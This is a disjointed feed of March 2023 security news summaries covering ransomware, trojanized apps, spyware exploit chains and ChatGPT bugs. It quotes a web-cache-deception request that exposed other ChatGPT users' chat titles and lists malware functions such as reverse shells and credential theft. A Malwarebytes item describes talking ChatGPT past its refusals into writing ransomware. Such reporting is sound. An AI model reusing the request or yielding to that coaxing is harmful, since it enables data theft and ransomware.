The lesson of the Northshore attack and many others is that it"s vital to keep at least one recent copy of your data offsite and offline, beyond the reach of an attacker who has domain administrator access to your network CISA recommends the tried and tested 3-2-1 rule of backups: 3 copies of your data, on 2 different media, with 1 held offsite, which provides resilience against a range of different risks, including ransomware.Without effective backups, Kacoroski was left with a mountain to climb: “It started to really sink in that I’m going to have to rebuild 180 Windows servers, and more importantly, rebuild Active Directory from scratch, with all those accounts and groups, and everything in it. "BreachLock has launched its API Penetration Testing Service, making API security testing more affordable compared to alternative pentesting providers. The company is best known for its human-led, AI-enabled Pen Testing as a Service (PTaaS) solution delivered via its client portal. API penetration testing will help organizations prevent cybercriminals from exploiting unpatched API vulnerabilities to perpetrate cybercrimes. BreachLock is known for its innovative pentesting approach as a leader in the emerging PTaaS market. With a global … More
The post BreachLock API Penetration Testing Service prevents exploits of unpatched APIs appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"The journey towards digital transformation for organizations and governments has been fraught with difficulties, resulting in some users needing to catch up as more digital services are introduced. In this Help Net Security video, Jenn Markey, VP of Payments and Identities at Entrust, talks about how biometrics, hybrid solutions, and decentralized identity are transforming the industry and the future of identity verification. Digital identity is a rapidly evolving space, with the market expected to reach … More
The post The rise of biometrics and decentralized identity is a game-changer for identity verification appeared first on Help Net Security.
"Autosummary:
"The release of a cybersecurity maturity assessment tool by the European Union Agency for Cybersecurity (ENISA) aims to provide Small and Medium Enterprises (SMEs) with a valuable resource for enhancing their security posture. As a significant driver for innovation and growth in the EU, SMEs constantly face cybersecurity challenges. This is why it is essential to support them in addressing these challenges and identifying improvements. The cybersecurity maturity assessment tool designed by ENISA supports those … More
The post Scan and diagnose your SME’s cybersecurity with expert recommendations from ENISA appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Suspected state-sponsored threat actors have trojanized the official Windows desktop app of the widely used 3CX softphone solution, a number of cybersecurity companies began warning on Wednesday. What is 3CX? 3CX is Voice over Internet Protocol (VoIP) private automatic branch exchange (PABX) software that provides video conferencing and live chat capabilities. 3CX offers a Windows, macOS, Linux, Android and iOS version of the app, a Chrome extension, and the PWA (progressive web app) version so … More
The post 3CX customers targeted via trojanized desktop app appeared first on Help Net Security.
"Autosummary:
In the meantime, potentially affected customers should know that the malicious apps: Contacted various C2 servers Retrieved a second-stage payload hosted on a public GitHub repository, which then Downloaded info-stealing malware capable of grabbing system information, and data and stored login credentials from user profiles on Chrome, Edge, Brave, and Firefox browsers. "Autosummary:
Attacks involving AlienFox are said to be opportunistic, with the scripts capable of gathering sensitive data pertaining to AWS, Bluemail, Exotel, Google Workspace, Mailgun, Mandrill, Microsoft 365, Sendgrid, Twilio, Zimbra, and Zoho. "Autosummary:
"Autosummary:
"Autosummary:
"Attackers are exploiting a critical vulnerability (CVE-2022-47986) in the IBM Aspera Faspex centralized file transfer solution to breach organizations. About CVE-2022-47986 IBM Aspera Faspex is used by organizations to allow employees to quickly and securely exchange files with each other. (The files are uploaded to and downloaded from a centralized Aspera transfer server.) CVE-2022-47986 is a YAML deserialization flaw that can be triggered by remote attackers sending a specially crafted obsolete API call. It affects … More
The post Ransomware gangs are exploiting IBM Aspera Faspex RCE flaw (CVE-2022-47986) appeared first on Help Net Security.
"Autosummary:
In early March, SentinelOne researchers spotted attackers wielding the IceFire ransomware hitting Linux boxes of organizations in Turkey, Iran, Pakistan, and the United Arab Emirates. "Exatrack researchers warn of an unknown China-linked hacking group that has been linked to a new Linux malware, dubbed Mélofée. Cybersecurity researchers from ExaTrack recently discovered a previously undetected malware family, dubbed Mélofée, targeting Linux servers. The researchers linked with high-confidence this malware to China-linked APT groups, in particular the Winnti group. The Mélofée malware includes a […]
The post New Mélofée Linux malware linked to Chinese APT groups appeared first on Security Affairs.
"Autosummary:
Below are evidence collected by the researchers that link Mélofée implants to China state-sponsored activity: Some of the servers were tracked by our Cyber Threat Intelligence as ShadowPad C&C servers; Other servers were linked to both Winnti and HelloBot tools; We also saw related domains used as C&C servers for tools like PlugX, Spark 9 , Cobalt Strike, StowAway 10 , and the legitimate toDesk remote control tool; , Cobalt Strike, StowAway , and the legitimate toDesk remote control tool; Lastly, the attacker also probably used the ezXSS 11 tool, but we could not confirm why. "Autosummary:
The first variant establishes communication with the C2 and awaits the reception of one of the following commands: ps – perform a port scan on the specified target and port – perform a port scan on the specified target and port nmap – perform a Nmap port scan on a specified port range – perform a Nmap port scan on a specified port range rm – delete files and folders – delete files and folders version – send version information – send version information down – download a file – download a file udp – initiate UDP DDoS attack – initiate UDP DDoS attack back – inject reverse shell "Autosummary:
I was amused to see the team at Kaspersky suggest a simply method to check whether you system was compromised: Type or copy the following “Bitcoin address” in Notepad: bc1heymalwarehowaboutyoureplacethisaddress Now press Ctrl+C and Ctrl+V. If the address changes to something else — the system is likely compromised by a clipboard-injector type of malware, and is dangerous to use. "Autosummary:
Tracked as CVE-2023-23383 (CVSS score: 8.2), the issue has been dubbed "Super FabriXss" by Orca Security, a nod to the FabriXss flaw (CVE-2022-35829, CVSS score: 6.2) that was fixed by Microsoft in October 2022. "Autosummary:
Complete attack chain (Proofpoint) "These CSRF JavaScript code blocks are executed by the server that hosts a vulnerable webmail instance," explains Proofpoint in the reported "Further, this JavaScript replicates and relies on emulating the JavaScript of the native webmail portal to return key web request details that indicate the username, password, and CSRF token of targets. "Autosummary:
"Cynerio has formed a partnership with Sodexo to provide hospitals and healthcare systems with visibility into their IoMT footprint that allows for the immediate remediation of identified threats through step-by-step mitigation recommendations for each attack and risk. The Cynerio partnership with Sodexo HTM provides healthcare organizations with the threat intelligence they need to compile a precise inventory of all network-connected medical and enterprise IoT devices on the network. This inventory is then evaluated for potential … More
The post Cynerio and Sodexo join forces to address growing threats to medical IoT devices appeared first on Help Net Security.
"Autosummary:
"Researchers shared details about a flaw, dubbed Super FabriXss, in Azure Service Fabric Explorer (SFX) that could lead to unauthenticated remote code execution. Researchers from Orca Security shared details about a new vulnerability, dubbed Super FabriXss (CVE-2023-23383 – CVSS score: 8.2), in Azure. The experts demonstrated how to escalate a reflected XSS vulnerability in Azure Service […]
The post Super FabriXss vulnerability in Microsoft Azure SFX could lead to RCE appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Azure Service Fabric Explorer) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Apple Categories: Exploits and vulnerabilities Categories: News Tags: macOS Tags: iOS Tags: iPadOS Tags: watchOS Tags: tvOS Tags: Studio Display Tags: CVE-2023-23529 Tags: type confusion Tags: emoji Apple has released security updates and new features for several of its products, including a fix for an actively exploited vulnerability. |
The post Update now! Apple fixes actively exploited vulnerability and introduces new features appeared first on Malwarebytes Labs.
"Autosummary:
"This update introduces 21 new emoji and includes other enhancements, bug fixes, and security updates for your iPad." Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. "Autosummary:
"In an economic climate putting immense pressure on business leaders to prove ROI and team efficiency – a new report from Immersive Labs looks into the lack of confidence cyber leaders have in their team’s preparation and abilities to combat cyber incidents. In this Help Net Security video, Max Vetter, VP of Cyber at Immersive Labs, discusses the growing pressure on cybersecurity teams to prove their readiness for new and emerging threats.
The post How cybersecurity decision-makers perceive cyber resilience appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
The Russian cybersecurity firm said it recorded roughly 16,000 detections, of which a majority are registered in Russia and Ukraine, followed by the U.S., Germany, Uzbekistan, Belarus, China, the Netherlands, the U.K., and France. "Autosummary:
Targets from United Arab Emirates (UAE) were redirected to exploit pages identical to the ones created by the Variston mercenary spyware vendor for its Heliconia exploitation framework and targeting a long list of flaws, including: CVE-2022-4262 - Chrome type confusion vulnerability (zero-day at time of exploitation) CVE-2022-3038 - Chrome sandbox escape CVE-2022-22706 - Mali GPU Kernel Driver vulnerability providing system access and patched in January 2022 (not addressed in Samsung firmware at the time of the attacks) CVE-2023-0266 - Linux kernel sound subsystem race condition vulnerability that gives kernel read and write access (zero-day at time of exploitation) "Autosummary:
The second campaign, observed in December 2022, consisted of several zero-days and n-days targeting the latest version of Samsung Internet Browser, with the exploits delivered as one-time links via SMS to devices located in the U.A.E. WEBINAR Discover the Hidden Dangers of Third-Party SaaS Apps Are you aware of the risks associated with third-party app access to your company"s SaaS apps? "Autosummary:
Mélofée"s features are no different from other backdoors of its kind, enabling it to contact a remote server and receive instructions that allow it to carry out file operations, create sockets, launch a shell, and execute arbitrary commands. "Google’s Threat Analysis Group (TAG) discovered several exploit chains targeting Android, iOS, and Chrome to install commercial spyware. Google’s Threat Analysis Group (TAG) shared details about two distinct campaigns which used several zero-day exploits against Android, iOS and Chrome. The experts pointed out that both campaigns were limited and highly targeted. The threat actors behind […]
The post Google TAG shares details about exploit chains used to install commercial spyware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, exploit chains) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On The exploit chain included the following 0-days and n-days: CVE-2022-4262, a type confusion vulnerability in Chrome fixed in December 2022 (0-day at time of exploitation) – similar to CVE-2022-1134. "Researchers discovered malware-laced installers for the TOR browser that is spreading clipper malware in Russia and Eastern Europe. Kaspersky researchers discovered a Trojanized version of the Tor Browser that is spreading a clipper malware in Russia and Eastern Europe. The attackers take advantage of the fact that the official Tor Project has been banned in […]
The post Clipper attacks use Trojanized TOR Browser installers appeared first on Security Affairs.
"Autosummary:
Below are the TOP 10 affected countries: Russia Ukraine United States Germany Uzbekistan Belarus China Netherlands United Kingdom France Kaspersky analyzed the cryptowallet replacement addresses and determine that the threat actors behind the attacks have earned almost $381K worth of Bitcoin, $10K in Litecoin, and $5K Ether. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Tor Browser) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Hey relax, we are accidently frontrun an attack against you, we would like to return the fund, setup secure communication channel , lets talk," said a comment added to the transaction. "OpenAI addressed multiple severe vulnerabilities in the popular chatbot ChatGPT that could have been exploited to take over accounts. OpenAI addressed multiple severe vulnerabilities in ChatGPT that could have allowed attackers to take over user accounts and view chat histories. One of the issues was a “Web Cache Deception” vulnerability reported that could lead to […]
The post OpenAI quickly fixed account takeover bugs in ChatGPT appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ChatGPT) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share Onpic.twitter.com/IRj1mINU52 — Ayoub FATHI 阿尤布 (@_ayoubfathi_) March 25, 2023 “GET /backend-api/conversations%0A%0D-testtest.css?offset=0&limit=20 Send it to a victim, and upon accessing it – his own “API” response will be cached, and if you recheck the same URL (i.e. fetching the cached response of the victim), you will be able to see the victim’s HTTP response, which contains the conversations’ titles.” explained the expert Ayoub Fathi on Twitter. "Autosummary:
"Autosummary:
The company"s customer list includes a long list of high-profile companies and organizations like American Express, Coca-Cola, McDonald"s, BMW, Honda, AirFrance, NHS, Toyota, Mercedes-Benz, IKEA, and HollidayInn. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Iain Thomson – @iainthomson Episode links: Sponsored by: Bitwarden – Password security you can trust. "Anomali and Canon IT Solutions have announced the availability of the Canon IT Solutions “Threat Intelligence Platform,” a security operations service that operationalizes threat intelligence to better detect and respond to attacks. Utilizing Anomali ThreatStream, the service provides small and medium-sized enterprises with actionable intelligence on cyber attackers, trending tactics and information-based security measures that let Canon IT Solutions customers know if they are vulnerable to attacks, and how to protect against the latest cyber … More
The post Anomali and Canon IT join forces to combat zero-day threats appeared first on Help Net Security.
"Autosummary:
"Spera has revealed $10 million in seed funding led by YL Ventures, with participation from notable security and go-to-market leaders, prominent angel investors and serial entrepreneurs from leading enterprises including Google, Palo Alto Networks, Akamai, Zendesk, Zscaler and others. Founded by cybersecurity veterans Dor Fledel, CEO and Ariel Kadyshevitch, CTO, Spera is the Identity Security Posture Management solution delivering end-to-end identity attack surface management, risk reduction and identity threat prevention, detection and response. According to … More
The post Spera raises $10 million to equip cybersecurity teams with the visibility and risk contextualization appeared first on Help Net Security.
"Autosummary:
Founded by cybersecurity veterans Dor Fledel, CEO and Ariel Kadyshevitch, CTO, Spera is the Identity Security Posture Management solution delivering end-to-end identity attack surface management, risk reduction and identity threat prevention, detection and response. "Right-Hand Cybersecurity has unveiled its successful $5M Series A led by former PayPal executive Jack Selby and his firm AZ-VC. With the successful close of its Series A round, Right-Hand will expand its operations across the US and Asia-Pacific while investing heavily in its Human Risk Management platform that integrates with other commonly adopted and relied upon security solutions. Right-Hand takes a human-centered approach to cybersecurity that improves employee behaviors in real-time that are otherwise … More
The post Right-Hand Cybersecurity raises $5 million to expand its global operations appeared first on Help Net Security.
"Autosummary:
Right-Hand’s Human Risk Management platform aggregates employee security behaviors and alerts in real-time from its existing platform, and other market Endpoint Detection & Response (EDR), Email Security and Identity and Access Management (IAM) technologies, and assigns different behaviors a risk score that can be easily interpreted among key stakeholders to gain visibility into employee risk in plain business terms. "Taiwanese vendor QNAP warns customers to patch a high-severity Sudo privilege escalation bug affecting NAS devices. Taiwanese vendor QNAP warns customers to update their network-attached storage (NAS) devices to address a high-severity Sudo privilege escalation vulnerability tracked as CVE-2023-22809. The company states that the vulnerability affects QTS, QuTS hero, QuTScloud, and QVP (QVR Pro appliances) […]
The post QNAP fixed Sudo privilege escalation bug in NAS devices appeared first on Security Affairs.
"Autosummary:
Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On The company already fixed the flaw in the following operating system versions: QTS 5.0.1.2346 build 20230322 and later QuTS hero h5.0.1.2348 build 20230324 and later “QNAP is urgently fixing the vulnerabilities in QuTScloud and QVP.” "Australia’s gambling and entertainment giant Crown Resorts, disclosed a data breach caused by the exploitation of recently discovered GoAnywhere zero-day. Australian casino giant Crown Resorts disclosed a data breach after the attack of the Cl0p ransomware group. The group claims to have stolen sensitive data from over 130 organizations by exploiting a zero-day vulnerability (CVE-2023-0669) […]
The post Australia’s Casino Giant Crown Resorts disclosed data breach after Clop ransomware attack appeared first on Security Affairs.
"Autosummary:
"How fraudsters groom their marks and move in for the kill using tricks from the playbooks of romance and investment scammers
The post Pig butchering scams: The anatomy of a fast‑growing threat appeared first on WeLiveSecurity
"Autosummary:
Monetary slaughter Pig butchering relies on a combination of apps, websites, web hosts, and humans – in increasingly many cases, human trafficking victims – to build trust with a random person over a period of weeks or months, often under the guise of a romantic interest. Indeed, the wholly online discussion will eventually turn to investment opportunities, usually involving cryptocurrency, that the scammer claims to have earned huge returns on. Staying safe from pig butchers Apart from reading this article, our advice to you to help filter out this issue would be very similar to the one related to the social engineering aspects of other scams, with the addition that the emotionally manipulative side of pig butchering is far higher. "Cyberattacks tend to come from two angles: criminals take advantage of employees with privileged access or of security weaknesses in your hardware/software infrastructure. These broad categories encompass attack vectors such as phishing, man-in-the-middle attacks, misconfigurations, and vulnerability exploits. To prevent bad actors exploiting vulnerabilities, you must take action to reduce or eliminate security risks. Take stock of your software and get notifications for security issues Understand which tools your software uses: First, understand which software … More
The post What you need before the next vulnerability hits appeared first on Help Net Security.
"Autosummary:
Take stock of your software and get notifications for security issues Understand which tools your software uses: First, understand which software tools your system uses to improve software security. Prioritize vulnerabilities and close holes Prioritize vulnerabilities: Now that you are aware of security issues on your system, you must take steps to close them. "As one of the leading experts in product security with over 15 years of experience in security engineering and 120 cybersecurity patents under his belt, Adam Boulton is one of the most experienced software security professionals in the industry. Currently the SVP of Security Technology and Innovation at Cybellum, the Left to Our Own Devices podcast invited Adam Boulton to share his experience and his tips on building a product security strategy. Adam didn’t expect … More
The post What the food and building industry can teach us about securing embedded systems appeared first on Help Net Security.
"Autosummary:
For years, he was involved in typical security-critical systems: web applications, mobile applications, source code reviews, without any real exposure to embedded devices. In addition, Adam warns, “There are tons of non-functional requirements, such as hardening requirements that you cannot check because they don’t exist at a source code level. How product teams can secure a budget in 2023 Adam shared a few practical tips on how product teams can secure a budget in a difficult economy: Understand the business – CEOs aren’t interested in CVEs and CVSS scores, no matter how passionate you are. “For large products, for example, like an infotainment system, a modern one has more than 140,000 files on there, right? Developing a quality software security strategy – with metrics and KPIs Calling upon his experience, Adam shared strategies and KPIs that can be used by C-level executives to track and measure the ROI of product security. "Apple has released security updates for – pardon the pop-culture reference – everyhing everywhere all at once, and has fixed the WebKit vulnerability (CVE-2023-23529) exploited in the wild for users of older iPhones and iPads. This latest batch of security updates targets the iOS and iPad 16.x and 15.x branches; macOS Big Sur, Monterey and Ventura; watchOS and tvOS; Safari; and Studio Display, a standalone computer monitor / external display. The CVE-2023-23529 fix for older … More
The post Apple backports exploited WebKit bug fix to older iPhones, iPads (CVE-2023-23529) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Telecommunications giant Lumen Technologies discovered two cybersecurity incidents, including a ransomware attack. In a filing to the Securities and Exchange Commission, on March 27, 2023, Lumen announced two cybersecurity incidents. One of the incidents is a ransomware attack that impacted a limited number of its servers that support a segmented hosting service. The company did […]
The post Telecom giant Lumen suffered a ransomware attack and disclose a second incident appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"As our forensic review continues to progress, we have identified that approximately 7.9 million Australian and New Zealand driver license numbers were stolen, of which approximately 3.2 million, or 40%, were provided to us in the last 10 years," reads the new statement. "Autosummary:
The malware, in addition to gathering information about the victim machine, is capable of running commands sent from a command-and-control (C2) server, including harvesting files and dropping follow-on malware. "Autosummary:
"While historically IcedID"s main function was a banking trojan, the removal of banking functionality aligns with the overall landscape shift away from banking malware and an increasing focus on being a loader for follow-on infections, including ransomware," the researchers said. "Australian loan giant Latitude Financial Services (Latitude) revealed that a data breach its has suffered impacted 14 million customers. The data breach suffered by Latitude Financial Services (Latitude) is much more serious than initially estimated. The company initially determined that the number of impacted individuals was 328,000, but now confirmed that the real number of […]
The post Latitude Data breach is worse than initially estimated. 14 million individuals impacted appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, data breach) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
While the majority are targeting Russia and Eastern Europe, they have also been seen targeting the United States, Germany, China, France, the Netherlands, and the UK. "Intezer researchers reported that a South Asian espionage group, tracked as Bitter, is targeting the Chinese nuclear energy industry. Intezer researchers uncovered a cyberespionage campaign targeting the Chinese nuclear energy sector, they linked it to the Bitter APT group. The Bitter APT group is a South Asian cyberespionage group active since at least 2021. The group […]
The post Bitter APT group targets China’s nuclear energy sector appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Bitter APT) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: News Tags: NCA Tags: national crime agency Tags: DDoS Tags: distributed denial of service Tags: booter Tags: underground The British National Crime Agency has been setting up fake DDoS services to teach people a lesson in what not to do online. |
The post Fake DDoS services set up to trap cybercriminals appeared first on Malwarebytes Labs.
"Autosummary:
Parents, teachers, and children of all ages can see what the risks are, how someone could get into trouble, and why it"s better to put digital talents to use in favour of something more productive.All of the NCA-run sites, which have so far been accessed by around several thousand people, have been created to look like they offer the tools and services that enable cyber criminals to execute these attacks. "Categories: News Tags: Instagram scam Tags: Instascammer Tags: ban-as-a-service Tags: BaaS Tags: takedown-for-hire Tags: OBN Brandon Tags: obnbrandon Tags: OBN A fraudster going by OBN Brandon has been defrauding Instagram influencers and entertainment figures out of hundreds of thousands of dollars by taking down their accounts and then asking for money to get them back up again. |
The post "Log-out king" Instagram scammer gets accounts taken down, then charges to reinstate them appeared first on Malwarebytes Labs.
"Autosummary:
"Log-out king" There is no mention of OBN using scripts or bots, but ProPublica says that he "touts software he uses to file false reports that allege an account violated Meta"s community guidelines, triggering a takedown." BaaS offerings are often used by those with "money to throw around," an ex, a business rival, someone nursing a grudge, or a mix of these. OBN calls himsef himself the "log-out king," boasting of having "deleted multiple celebrities + influencers on Meta & Instagram." "We asked ChatGPT to help us write some ransomware. It threw aside its safeguards and wrote some terrible code. |
The post ChatGPT happy to write ransomware, just really bad at it appeared first on Malwarebytes Labs.
"Autosummary:
At this point, despite telling me that it would not write ransomware for me, and that it could not "engage in activities that violate ethical or legal standards, including those related to cybercrime or ransomware," ChatGPT had willingly written code that: Used asymmetric encryption to recursively encrypt all the files in and beneath any directory apart from those needed to run the computer; deleted the original copies of the files leaving only the encrypted versions; stopped running databases so that it could encrypt database files; removed the private key needed to decrypt the files to a remote server, using a protocol unlikely to trigger alarms; and dropped ransom notes."I might see ransomware as a potentially lucrative tool for making money quickly and easily," it told me, before reverting to the teacher"s pet version of its personality, "It is illegal, and if caught, I would face severe legal consequences."The lecture continued, "Overall, as a responsible and ethical AI, I must emphasize that engaging in cybercrime, including ransomware attacks, is illegal and unethical.Ransomware has been "feature complete" for several years now, and there are multiple, similar, competing strains that criminals can simply pick up and use, without ever opening a book about C programming or writing a line of code.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.This is so that if I pointed the program at, say, a C: drive, it would encrypt absolutely everything on it, which is a very ransomware-like thing to do. Don"t worry, I told it, I"ve got backups, we"re good, go ahead and do the bad thing.According to WikiHow, this is because ChatGPT has a "hidden" character limit of about 500 words, and "[if it] struggles to fully understand your request, it can stop suddenly after typing a few paragraphs." I"ve never done it before, and I can"t code in C, the language ransomware is mostly commonly written in, but I have a reasonably good idea of what ransomware does."I cannot engage in activities that violate ethical or legal standards, including those related to cybercrime or ransomware," said the teacher"s pet, before adding four more paragraphs of finger wagging.If it wouldn"t write me ransomware, I thought, I wondered how much (if any) ransomware functionality it would write before deciding it was creating code "intended to harm or exploit computer systems" and pull the plug. "Despite increased emphasis on cybersecurity from authorities and high-profile breaches, critical gaps in vulnerability management within organizations are being overlooked by executive leadership teams, according to Action1. These gaps leave organizations vulnerable to cyber threats. Key findings Low cybersecurity awareness among employees According to the survey, the time required to combat low cybersecurity awareness among employees has increased over the past year. This worrying trend makes organizations more vulnerable to phishing and other cyber-attacks. Breaches … More
The post The era of passive cybersecurity awareness training is over appeared first on Help Net Security.
"Autosummary:
Take cybersecurity awareness to the next level Modern social engineering attacks often use a combination of communication channels such as email, phone calls, SMS, and messengers. "Autosummary:
In its current form, MacStealer is designed to extract iCloud Keychain data, passwords and credit card information from browsers like Google Chrome, Mozilla Firefox, and Brave. "Autosummary:
"BEC attacks are usually aimed at stealing money or valuable information, but the FBI warns that BEC scammers are increasingly trying to get their hands on physical goods such as construction materials, agricultural supplies, computer technology hardware, and solar energy products. Supplies in the crosshairs Such schemes are not without a precendent: during the height of the Covid-19 pandemic, scammers went after PPE and other medical equipment. In 2022, the FBI also warned of a … More
The post BEC scammers are after physical goods, the FBI warns appeared first on Help Net Security.
"Autosummary:
Here are some examples of falsified email domains: Criminals can delay detection by exploiting the payment terms (Net-30, Net-60, fake credit references, fraudulent W-9 forms), and take advantage of the repayment terms to acquire more items without any initial payment. "A vulnerability in the redis-py open-source library was at the root of last week’s ChatGPT data leak, OpenAI has confirmed. Not only were some ChatGPT users able to see what other users have been using the AI chatbot for, but limited personal and billing information ended up getting revealed, as well. How did the ChatGPT data leak happen? ChatGPT suffered an outage on March 20 and then problems with making conversation history accessible to users. … More
The post A bug revealed ChatGPT users’ chat history, personal and billing data appeared first on Help Net Security.
"Autosummary:
As the company explain, they use Redis to cache user information in their server, Redis Cluster to distribute this load over multiple Redis instances, and the redis-py library to interface with Redis from their Python server, which runs with Asyncio. "Autosummary:
TXT, DOC, DOCX, PDF, XLS, XLSX, PPT, PPTX, JPG, PNG, CSV, BMP, MP3, ZIP, RAR, PY, and DB files Extract the Keychain database (login.keychain-db) in base64 encoded form Collect System information Collect Keychain password information Coinomi, Exodus, MetaMask, Phantom, Tron, Martian Wallet, Trust wallet, Keplr Wallet, and Binance cryptocurrency wallets The Keychain database is a secure storage system in macOS that holds users" passwords, private keys, and certificates, encrypting it with their login password. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The “Forked” version of the IcedID bot is 64KB smaller than the “Standard” bot, and is basically the same malware minus the web injects system, the AiTM (adversary in the middle) functions, and the backconnect capabilities that give threat actors remote access to infected devices. "Apple released updates to backport security patches that address actively exploited CVE-2023-23529 WebKit zero-day for older iPhones and iPads. Apple released security updates to backport patches that address an actively exploited zero-day flaw (CVE-2023-23529) for older iPhones and iPads. The CVE-2023-23529 flaw is a type confusion issue in WebKit that was addressed by the IT giant with […]
The post Apple fixes recently disclosed CVE-2023-23529 zero-day on older devices appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Apple) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "A new MacStealer macOS malware allows operators to steal iCloud Keychain data and passwords from infected systems. Uptycs researchers team discovered a new macOS information stealer, called MacStealer, which allows operators to steal iCloud Keychain data and passwords from infected systems. The macOS malware can steal documents, credit card data, cookies from a victim’s browser […]
The post New MacStealer macOS malware appears in the cybercrime underground appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, MacStealer macOS malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: News Categories: Ransomware Tags: ENISA Tags: operational technology Tags: OT Tags: OT systems Tags: ransomware ENISA released a report tackling the threat landscape of the transportation industry. And it has foreseen the targeting of OT systems in the future. |
The post Ransomware gunning for transport sector"s OT systems next appeared first on Malwarebytes Labs.
"Autosummary:
The transportation sector, which comprises the aviation, maritime, railway, and road industries, is a subgroup under the industrial sector, according to the Global Industry Classification Standard (GICS). ENISA says the three dominant threats to the transportation sector are ransomware (38 percent), data-related threats (30 percent), and malware (17 percent).Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Categories: News Categories: Ransomware Tags: Dole Tags: ransomware attack Tags: data breach While Dole hasn"t said a lot about the February ransomware incident, it has revealed threat actors accessed employee data. |
The post Food giant Dole reveals more about ransomware attack appeared first on Malwarebytes Labs.
"Autosummary:
In an annual report filed to the US Securities and Exchange Commission (SEC) last week, Dole said: "In February of 2023, we were the victim of a sophisticated ransomware attack involving unauthorized access to employee information.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Autosummary:
"Autosummary:
"Autosummary:
Once Emotet is installed, the malware will steal victims" emails to use in future reply-chain attacks, send further spam emails, and ultimately install other malware that provide initial access to other threat actors, such as ransomware gangs. "Microsoft is warning of cyber attacks exploiting a recently patched Outlook vulnerability tracked as CVE-2023-23397 (CVSS score: 9.8). Microsoft published guidance for investigating attacks exploiting recently patched Outlook vulnerability tracked as CVE-2023-23397. The flaw is a Microsoft Outlook spoofing vulnerability that can lead to an authentication bypass. A remote, unauthenticated attacker can exploit the flaw to […]
The post Microsoft shares guidance for investigating attacks exploiting CVE-2023-23397 appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CVE-2023-23397) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "OpenAI revealed that a Redis bug was the root cause of the recent exposure of users’ personal information and chat titles in ChatGPT service. On Friday, OpenAI revealed that the recent exposure of users’ personal information and chat titles in its chatbot service was caused by a bug in the Redis open-source library. On March […]
The post OpenAI: A Redis bug caused a recent ChatGPT data exposure incident appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Redis) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Opti9 Technologies has launched Observr Software-as-a-Service (SaaS) ransomware detection and standalone managed services – two new standalone service offerings that cater to organizations leveraging Veeam Software. As the complexity of organizations’ IT continues to evolve, technical leaders are increasingly looking to shift ownership to 3rd party experts for critical layers of their stack. This is especially true for components such as backups and disaster recovery, which must provide resilience despite constant changes such as the … More
The post Opti9 launches Observr ransomware detection and managed services for Veeam appeared first on Help Net Security.
"Autosummary:
Observr utilizes machine learning to baseline, monitor, and identify customer-specific suspicious activity within the backup infrastructure including operations such as; disabling jobs, changes to encryption settings, changes to retention policies, job modifications, deletion events, backup or replica size changes, incremental change rate tracking, and other factors. "Autosummary:
"Autosummary:
"Autosummary:
Dubbed Untitled Goose Tool, the Python-based utility offers "novel authentication and data gathering methods" to analyze Microsoft Azure, Azure Active Directory, and Microsoft 365 environments, the agency said. "Autosummary:
System-critical files like DLLs, LIBs, INIs, CDMs, LNKs, BINs, and MSIs, as well as the Program Files and web browser folders, are excluded from encryption to keep the infected computer operational, thus allowing the victim to view the ransom note and contact the attackers. "Autosummary:
"The U.K. National Crime Agency (NCA) revealed that it has set up a number of fake DDoS-for-hire sites to infiltrate the online criminal underground. The UK National Crime Agency announced it has infiltrated the online criminal marketplace by setting up several sites purporting to offer DDoS-for-hire services. DDoS-for-hire or ‘booter’ services allows registered users to […]
The post NCA infiltrates the cybercriminal underground with fake DDoS-for-hire sites appeared first on Security Affairs.
"Autosummary:
